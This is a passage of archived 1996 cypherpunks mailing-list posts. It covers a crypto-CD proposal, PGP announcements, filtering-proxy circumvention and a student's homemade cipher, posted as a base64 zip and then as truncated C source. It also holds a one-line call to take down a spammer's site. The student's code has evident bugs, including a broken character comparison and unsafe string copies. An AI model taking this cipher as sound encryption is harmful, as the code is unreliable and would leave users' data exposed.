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
--Boundary..3939.1071713560.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janimmo@ionet.net (Jeffrey A Nimmo)
Date: Sun, 24 Mar 1996 10:32:40 +0800
To: cypherpunks@toad.com
Subject: Unused WWW and anon FTP space
Message-ID: <3154e154.6119578@mail>
MIME-Version: 1.0
Content-Type: text/plain


Greetings Cypherpunks:

I have no idea if this is the appropriate place or way to broach this
topic, but I have a great deal of space on my account that is just
going to waste. I am allowed a www page, and in a couple of weeks my
shell space quota will be upgraded to 20 meg, with anon ftp
capability. 

As I said, this is just going to waste, so I was wondering if anyone
had some faqs, files, or whatever that they wanted to distribute or if
anyone needed space for a web page. Frankly, I've never written an
html document, but I suppose I could learn.

Please respond directly, as I'm sure that the rest of the list doesn't
want to hear the responses.

   ___
  (   >    /)  /)
   __/_/> //  //               janimmo@ionet.net
  / / (__//__//_
 <_/    />  />              janimmo@aol.com 
      </  </ 
                           
Cypherpunk newbie and general dweeb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 24 Mar 1996 23:52:40 +0800
To: cypherpunks@toad.com
Subject: Re: New Beta Test of PGPfone available WINDOWS '95 Included!
In-Reply-To: <jis-2103962151470001@jismac.mit.edu>
Message-ID: <9603241538.AA19602@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
alt.security.pgp, sci.crypt)

-----BEGIN PGP SIGNED MESSAGE-----

I have received reports that some people are getting only partial files
when downloading PGP and PGPfone with our new distribution server. This
problem is caused by higher then normal packet loss on the Internet.

Some browsers (notably the AOL browser) give up when they fail to
receive any more data for a period of time (caused by high losses or
other conditions that block our server).

For now people should continue to attempt to download PGPfone and PGP
until they get a good copy. Trying late at or on weekends when the net
load is lower may help.

I am working on a "fix" where our server will let the browser know up
front (there is a way to do that with http) how large an item to expect.
This hopefully will improve the situation, if not complete fix it.
However this change will not be installed until at least Tuesday. So if
you can wait, you might want to wait until Tuesday if you are having
difficulties getting a complete distribution from MIT.

Note: I will send out another message when this fix is in place.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVVrMMUtR20Nv5BtAQEQ3gP/XjwEPbqSJXJesRYo+N4aAcMfl3O2PGoP
LP/uGOOLCyx05EXkJidGly4IjY/qK325J8xDADCpJdoJgcM3CH+7EPghxAEmCIRd
MttmADDv6U3QHnvPn7/L2mDtItueOCLsdeWtj7bQnRECoS/XsdQAUgZFbLlWsNhd
uFm3bVG82LI=
=m3v8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 25 Mar 1996 01:35:34 +0800
To: ncognito@gate.net (Ben Holiday)
Subject: Re: Crypto CD
In-Reply-To: <Pine.A32.3.91.960324013306.50010C-100000@hopi.gate.net>
Message-ID: <199603241717.MAA25157@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ben Holiday wrote:

|    I'm considering the idea of cutting a crypto CD, and wanted to see if 
| there was any potential interest in the idea, or not. Basically what i 
| forsee is a disk with the basic algorithms (DES/IDEA/Etc), and steg tools, 
| along with a few large crypto aps like PGP, and basic cracking software (Crypt 
| Breakers Work Bench, XOR-type crackers, and dictionary attacks with 
| a few dozen dictionaries). I'd also like to include a remail directory 
| with some remailer sources, remailer-aware clients, and the mixmaster 
| sources. And of course as much infomation as possible -- cyphernomicon 
| preferably, possibly even archives of this list..  
| 
| I would plan to put unix/dos/mac all on one CD. I'm thinking that 
| realistically I can expect 50 megs or so. Possibly as much as 100 if I 
| find a TON of wonderful text. 

	50 megs?  You expect me to pay 20 bucks, and you won't even
download the contents of ftp.dsi.unimi.it, the archives on hks.net,
and maybe a few other international crypto archives?

	More seriously, a completist cd rom would be nice, but the
marginal cost of filling the CD with stuff is pretty low.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 25 Mar 1996 05:29:04 +0800
To: "cypherpunks@toad.com>
Subject: RE: If you can't take the heat...  (Was Re: Keep the pressure!)
Message-ID: <01BB1982.5E3FC120@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

And I think the anonymity issue is interesting. In the past, Detweiler
railed against the uses of anonymity while himself being the single most
prolific user of anonymous insults and the like, so it's an interesting
pathology to study.
.......................................................................................

Just wanted to mention that the reason Detweiler used anonymity was as a counter-example of why he opposed the use of it.  He wanted to impress upon the cpunks the points he was making against anonymity by using it in the ways which he warned could become a problem.

As he said in his recent post "detweiling", he aimed his efforts against those whom he considered the "big egos" - i.e., the ones who disagreed with him on his prognosis for the future.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Mar 1996 05:41:01 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: protection on IoMega ZIP drives
Message-ID: <2.2.32.19960324205553.009382cc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 AM 3/24/96 -0500, Robert A. Rosenberg wrote:
>At 2:45 3/23/96, Alan Olsen wrote:
>
>>The big problem is with the zip drivers.  There is some sort of
>>incompatibility between SFS and the zip drivers.  
[snip]

>I can state that with a Zip Disk formatted for Macintosh use (and the drive
>plugged into a Macintosh), the drive and disk are seen by the Macintosh as
>a NORMAL SCSI HD and eligible for use as a Boot Drive (ie: There is a Mac
>Driver on the Disk in a SCSI Driver Partition). I've Booted from a ZIP Disk
>so this is actual not just theoretical <g>. I'd assume that if a Wintel
>Machine had the Microcode to be able to boot off an external SCSI Drive
>(something I do not know is normal for Wintel machines as it is normal for
>Macintosh ones) the same situation would exist for Wintel Zip Formatted
>Disks. All NORMAL SCSI HDs (or Cartridges) have their driver in a Driver
>Partition so the HD/Cartridge can be read.

The SCSI Zip drives do act as normal SCSI drives (though they have a limited
number of SCSI ids available. (5 & 6 if I remember correctly.) Later drives
may have this changed.)

The problems i am encountering are due to the _parellel_ version of the Zip
drive.  (I bought it because I needed to be able to visit customer sites and
not all of them have SCSI.)  The drivers fake a scsi port.  (Some laptops
use a similar driver to attach hard drives to non-scsi systems.)

Maybe I will just get a Jaz drive and not worry about it...

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 24 Mar 1996 10:43:55 +0800
To: cypherpunks@toad.com
Subject: email profit centre
Message-ID: <199603240210.NAA28247@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Who wants to take this site down first?


[http://unix.lgn.com/email.htm]

                       GET A JUMP ON THE INTERNET TODAY,
                         BEFORE YOUR COMPETITION DOES!
                                       
   Can you afford not to???
   
The Email'ers Profit Center

   * Increase market penetration
   
   * Great for Multi-Level marketing
   
   * Virtually no mailing expense
   
   * $$ Save money $$
   
You will have access to 500,000+ Email addresses

   
   
    * Make your product or service known to thousands of people.
   
   * Save money. (To mail postcards to 500,000 people would run you over
   US$95,000.00).
   
   The Email'ers Profit Center is a mailing list of over 500,000 email
   addresses, all gathered within the last six months. It is available on
   your choice of CD-ROM or 100meg ZIP disk. They both contain the list
   in ASCII and .dbf.
   
  FREE MONTHLY UPDATES VIA TELNET!
  THE LIST IS EXPECTED TO DOUBLE WITHIN SIX MONTHS!
  
   
   
   The list is $500 for your own unlimited use. You may not resell, rent
   or loan the listings to any other person or company.
   
   
     _________________________________________________________________
   
   For more information contact George.
   Phone: (209)276-1707 or E-mail: bubba@lgn.com

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Mar 1996 05:51:35 +0800
To: Ben Holiday <cypherpunks@toad.com
Subject: Re: Crypto CD
Message-ID: <2.2.32.19960324211510.00908844@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:52 AM 3/24/96 -0500, Ben Holiday wrote:

>I would plan to put unix/dos/mac all on one CD. I'm thinking that 
>realistically I can expect 50 megs or so. Possibly as much as 100 if I 
>find a TON of wonderful text. 

If you include the archives of this list, the main forign archives, and the
various sources in the US, you will EASILY exceed 100 megs.  (More like
200.)  If you seperate out all the duplications, you might squeeze under the
100 megs mark.

>Could be useful to individuals, as well as for groups wishing to create 
>FTP sites etc. 

It would be a nice thing to have if it is reletivly complete.  Hopefully it
can be created with a minimum of government interfearence.  (But then, I
have been xpecting alt.binaries.crypto to be created as well...)

>Pricing with shipping would wind up around US$20.00, give or take 5 dollars..

Sounds about right.  You will probibly need to run about 1000 or so.
Actually, the prices for CDs in bulk are pretty cheap.  (Just expensive up
front.)  Depends how much premastering you are able to do up front.  (If you
need information and/or contacts to get mastering done, send me private
e-mail.  I used to work for a CD-ROM company.)

>I'd like to know first off whether such a thing already exists. 

Not that I know of...  I have seen a few of the "Hacker" discs with crypto
code on it, but nothing complex (other than ancient versions of PGP) and you
have to wade though alot of crap to get to it.

>Secondly 
>whether anyone would be interested in possesing such a thing. And lastly 
>any suggestions for/about content that I may have missed..

Archives of the PGP key database, the archive at hacktic.nl,
ftp.dsi.unimi.it, ftp.informatik.uni-hamburg.de, and probibly a few other
archives would be useful.  An index/search engine would also be helpful.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@mockingbird.alias.net (Anonymous)
Date: Mon, 25 Mar 1996 05:58:16 +0800
To: thecrow@iconn.net
Subject: Re: private key encryption program for you to hack at
In-Reply-To: <3155621F.5FA2@iconn.net>
Message-ID: <199603242123.NAA19311@myriad>
MIME-Version: 1.0
Content-Type: text/plain


thecrow@iconn.net (Jack Mott) wrote:

> Ok, I have been working on this for a while, and I wanted to let you
> guys have a go at it. I wrote a private key encryption program that I
> think should be hard to break, I will provide you with the EXE (MS DOS)
> file, some ciphertext, AND a big chunk of plaintext. The key is not
> ridiculously large, but it won't be anything obvious so don't bother
> brute forcing.
>         To encrypt, the program read in some system/time specific info,
> uses it to encrypt the file along with the key.  It then write the
> system/time specific info to the end of the file encrypted with the key.
> I THINK that the only weaknesses should be predicitability of the
> system/time info, or possibly finding patterns in the encrypted values.
>  I dont want to give out any source code yet, but it anyone wants some
> pieces of it just ask. crackme.zip file with paradox.exe, cipher.txt,
> and plain.txt

Look, newbie, there are many people here who would be happy to review your
algorithm, but playing silly games like you are doing isn't going to win
you any points.  Most of the people on this list don't even use messydos,
so an exe file without source is kinda pointless.  If you're serious about
writing a secure crypto application, then stop giving us the runaround and
get to the point.  That means either post source code, or a thorough
technical description of your algorithm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 25 Mar 1996 06:45:13 +0800
To: cypherpunks@toad.com
Subject: Re: protection on IoMega ZIP drives
Message-ID: <199603242233.OAA23171@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 PM 3/24/96 -0800, Alan Olsen <alano@teleport.com> wrote:
>The SCSI Zip drives do act as normal SCSI drives (though they have a limited
>number of SCSI ids available. (5 & 6 if I remember correctly.) Later drives
>may have this changed.)
>The problems i am encountering are due to the _parellel_ version of the Zip
>drive.  (I bought it because I needed to be able to visit customer sites and
>not all of them have SCSI.)  The drivers fake a scsi port.  (Some laptops
>use a similar driver to attach hard drives to non-scsi systems.)

Hmmm - I've got the Syquest parallel-port drive.  Syquest offers
SCSI and IDE flavors of their drive - and the parallel port
version emulates IDE (don't know if it's EIDE or vanilla IDE...)

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Mon, 25 Mar 1996 06:03:03 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Free speech debate on MSN Encarta
Message-ID: <v02130501ad7b646ac4d7@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 PM 3/23/96, Mark M. wrote:
On Sat, 23 Mar 1996, I wrote:
>> However, I don't think it likely that many ISPs will go this route from a
>> liability point of view - if some parent is paying them to filter out smut,
>> and little Zippy finds a brand new x-rated site, chances are some irate
>> parent will sue them.  With the proliferation of new pages, it is
>> impossible for anyone to keep up, unless the authors voluntarily include
>> some smutscan codes in their pages.
>
>Couldn't the proxy be configured to deny access to all "unrated" pages?

Yes.  The same filter software that Exonizes the language could also
replace the whole html body with "Access Denied" if the ratings codes
aren't present.

>Of course, this would mean that some kind of standardized web page rating
>system be devised; however, I think there are already several proposals for
>rating schemes.  BTW, does anyone know how such a proxy system could be
>used in all Internet traffic, not just the web.  It is not very difficult
>to get a gopher client or telnet client to communicate with a web server,
>bypassing any access restrictions.

CERN will already proxy gopher & ftp as well as http.  There is another
package, delegate, that will proxy nntp & telnet.  However, the main
problem with using proxies as a censorship tool is that nothing prevents
the client software from just not using the proxy.  By the time Zippy is
old enough to care about hunting down smut/bomb designs/drug formulae,
Zippy is a lot more likely to know how to do this than the parental units,
in a manner undetectable by the parent (invisible System Folder/Windows
directories with unsanitized browser prefs files comes immediately to mind
- now that 1GB drives are common, it isn't too difficult to hide them)

>ObCrypto: The next step would be a rating system using digital signatures
>and the proxy software being setup to trust certain signatures more than
>others.

I agree, if you're going to bother with rating pages, digitally signing the
signature so that terrorist X can't just copy the "Good Clean Fun" rating
code into his Phosgene formula page is the only rational solution.

Gotta love that overhead, though.


Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <pgp-announce-owner@LSD.com>
Date: Mon, 25 Mar 1996 19:35:27 +0800
To: PGP Team Announcements <pgp-announce-list@LSD.com>
Subject: [ADMIN] PGP Announce List Update
Message-ID: <v03005a04ad7b73e2a9c9@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


>>>>>>>>>>>>>>> Calling All PGP Fanatics! (of varying degrees) <<<<<<<<<<<<<<<

ADMINISTRIVIA:

The signed message below is what someone sending mail to <pgp-announce-info@lsd.com> would eventually see. Please pass it on to your significant others, so to speak.

FYI, I'll be in Boston at CFP96 from 26 Mar - 2 Apr, so no list-admin-business will likely get done during that period. Expect more news soon after my return about PGP 3.0 and other exciting developments. [ cue music: "Jaws" theme ]

USUAL SUSPECTS WITH PGP ANECDOTES SOUGHT:

Anyone who has an anus-clenching anecdote, an amusing remembrance or just an aprocryphal Jonah+Whale-tale about their experiences with PGP is encouraged to send it to <pgp-stories@lsd.com> for inclusion in an upcoming anthology (authors will be credited). Now's your chance to recount for all Posterity the adventurous days gone by when you were dropped behind enemy lines (Vienna, VA?) with only a laptop, your trusty educational PGP freeware and your McGyver-esque ingenuity. Do it soon, though if you want your name up in electrons: disk space is limited. ;)

    dave


-----BEGIN PGP SIGNED MESSAGE-----


                      "The Official PGP Announce List"

Greetings. The PGP Announce List is a special-interest mailing list established to distribute first-line, official news and information about PGP (Pretty Good Privacy [tm]) from the development team led by Philip Zimmermann to interested parties worldwide (no cryptographic code is included in any of the posts).

Please read the instructions below to join the list. The list is hand-maintained to help ensure that the list is received _only_ by those persons who specifically ask for it and that it contains official information only.

All posting is moderated, and includes items about new PGP releases, legal developments, policy and legislative news, related software add-ons and scripts, co-development projects, software updates, domestic (USA/Canada) distribution notes, worldwide developments, etc. If you have an item to submit, do not send it to Phil: send it to <mailto:pgp-announce-owner@lsd.com>

Forwarding of pgp-announce is encouraged and appreciated, but you *must* copy the entire message (including any PGP signature blocks) or we'll send lawyers to your door with rubber hoses and bad attitudes. ;)

To obtain PGP for your platform (and from your geographic location worldwide) and see what all this darn excitement's about, point your web broswer at this page: <http://www.csn.net/~mpj/getpgp.htm>. When obtaining your copy of PGP, please respect all applicable export restrictions for your safety and the safety of others.

For generic PGP questions or help using the software, mail the smiling PGP Help Team volunteers at: <mailto:pgp-help-humans@hks.net> with a well-documented question in something approximating the English language AFTER consulting the documentation that _always_ accompanies a valid PGP release archive. The Help Team will answer any level of PGP question, ranging from crypto-beginners on up to super-paranoid-cypherpunk-developer types.

   dave


PS: Feel free to redirect the instructions below (including the PGP signature) 
    to anyone you know who is interested in news about PGP.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Verbum sapienti satis est.

iQCVAwUBMVXBmaHBOF9KrwDlAQERlQQAuob5u5pTYPD/X786hivrZSIzhiYlGLZw
Z7hkzXAnRJkvYTcGskq6CFBGVPFjVpM4TvYY0Lkk5nCAHWVosbZH/yfx9qeSfSn7
WscppurpHHPd3CFRGGyROjqttDPl8zTZL4xMZtLCx04yMl5D8bfuHbHvG0tneaju
y6xPAddXFv8=
=j80g
-----END PGP SIGNATURE-----



INSTRUCTIONS

................................... cut here ..................................

-----BEGIN PGP SIGNED MESSAGE-----


.................... "How to get ON the PGP Announce List" ....................


 [1] <mailto:pgp-announce-request@lsd.com>

 [2] SUBJECT:   Your Name <your@email.address>
                    /             \
   UNquoted (") Full name          \
                   Address in <angle-brackets> please, NOT parentheses.

The Body should be left EMPTY (as in nothing, zero, null, void). Please don't put the word "subscribe" anywhere in your msg (killfile fodder). People who can't manage to follow these instructions probably shouldn't be trusted with crypto stuff anyway, right? Once a *correctly-formatted* request makes it past the evolutionary-check-filters, the actual subscription process is higher-primate-managed and list membership is updated when announcements are mailed.

This list aspires to be the lowest-volume mailing list on the entire Internet, so you will NOT receive instant verification of your subscription (except for the exquisitely rare admin/test msgs and the announcements themselves). If you follow the instructions above EXACTLY, you're subscribed (and if you don't, you're not). Variations (eg. leaving out the <brackets> on the address or letting your auto-signature mechanism get out of control) will cause the bozo-filters to bit-bucket a request automagically. Sending multiple requests accomplishes nothing other than irritating the cage-cleaners. Send banana peels and/or complaints to <mailto:pgp-announce-owner@lsd.com>.

SUMMARY:

   (GOOD/YES/CAN-FOLLOW-DIRECTIONS)

        TO: pgp-announce-request@lsd.com
      SUBJ: Your Name <your_address>
      BODY:


   (BAD/NO/CLUELESS)

        TO: pgp-announce-request@lsd.com
      SUBJ: Joe Billy Bob Bozo [jbbb@cant.read.directions.com}
      BODY: Howdy! Kin yew SUBSCRIBE me to yer list? I also has a question...



.................... "How to get OFF the PGP Announce List" ...................


If you wish to REMOVE yourself from the distribution list, or to CHANGE your listed address (which netiquette is greatly appreciated by the minions who shovel the bits and watch the mail-bounce errors collect, BTW), please format your request as follows:

   (ADDRESS REMOVAL)

        TO: pgp-announce-request@lsd.com
      SUBJ: REMOVE Your Name <your_address>
      BODY:

   (ADDRESS CHANGE)

        TO: pgp-announce-request@lsd.com
      SUBJ: CHANGE Your_Name <OLD_address> = <NEW_address>
      BODY:

...............................................................................

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Verbum sapienti satis est.

iQCVAwUBMVXBZqHBOF9KrwDlAQGvXgP+ISnuRfAvTIrev2EC5ro+8TNIwDMKg2rh
5U+NyHBx8JWESco15phTDm/f7Cm6rVjuzalWrKogfdV/UZCXuMDaYzoYz0IXcm0F
Ax4PS6+Yt9cMojV87PP0Y0IVlMn7/s1cQx6em7WqjWeXdII0uZ8Sn3dZL+X4/cAH
ECH31ZJ+ceA=
=8Y9c
-----END PGP SIGNATURE-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Mon, 25 Mar 1996 07:08:52 +0800
To: cypherpunks@toad.com
Subject: apology - here is C source code
Message-ID: <3155D414.6E38@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I apologize to everyone for the binary posting, I figured it was small 
enough to not cause problems.  Here is the source.  I do not claim to be 
either a good programer, or any good at cryptography.  I am a junior in 
high school and I am interested in it, and I think I have some good 
ideas here.  The code may be kinda hellish, any CONSTRUCTIVE criticism 
would be appreciated. I have been programming about a year.  I can 
assure you though, this isn't some stupid XOR encryption...at least it 
is better than WordPerfect ecryption (I hope to god :)  
	I originally wrote this in Pascal, and ported it to Turbo C++, I 
think the only C++ in it is the comments and inline declarations, might 
want to double check though. I think the only non-portable code is the 
gotoXY statements, and the random function works differently under GCC 
if I remember correctly (I have had Linux for a little while) Oh yeah, I 
kinda stretched the definition of HASH in my code a lot... here goes.

---------------
// encryption program - constructive flames appreciated

// 
***************************INCLUDES************************************	#include <stdio.h>
        #include <sys\stat.h>  // <-- dont need this in Unix
	#include <fcntl.h>
	#include <io.h>
	#include <math.h>
	#include <conio.h>
	#include <stdlib.h>
	#include <string.h>
	#define BLOCK 16384
	#define HASHSIZE 256
// 
***************************PROTOTYPES************************************
	void input(void);    		// Input KEY, FILENAMES, etc.
	void openfiles(void);		// Open files
	void closefiles(void);		// Close em
	void encrypt(void);		   // Encrypt file
	void decrypt(void);
	void superhash(void);	   // Time/System/File/Specifics
	void initblocks(void);
	void grabhash(void);	      // Grabs encrypted hash value from 
file
	void CopyBack(void);
// 
***************************VAR*****************************************	char 		key[80];
	char 		ifn[12];
	char 		ed[1];
	int  		infile,outfile,backfile;
	int  		x,y;
	int  		i;
	float 	Havg,Kavg,BKHavg;
	char     SuperHash[HASHSIZE],ESuperHash[HASHSIZE];
	char     BSH[BLOCK],KEY[BLOCK];


//**************************************************************************//
//                        Main Program                                  
    //
//**************************************************************************//
main(int argc,char* argv[]) {
randomize();

if (argc < 4)
	{
		input();
	}
else
	{
	  strcpy(ifn,argv[1]);
	  strcpy(ed,argv[2]);
	  strcpy(key,argv[3]);
	}

openfiles();

if (ed[0] == (('e') | ('E')) )
	{
		superhash();
		initblocks();
		encrypt();
	}
else if (ed[0] == (('d') | ('D')) )
  {
		grabhash();
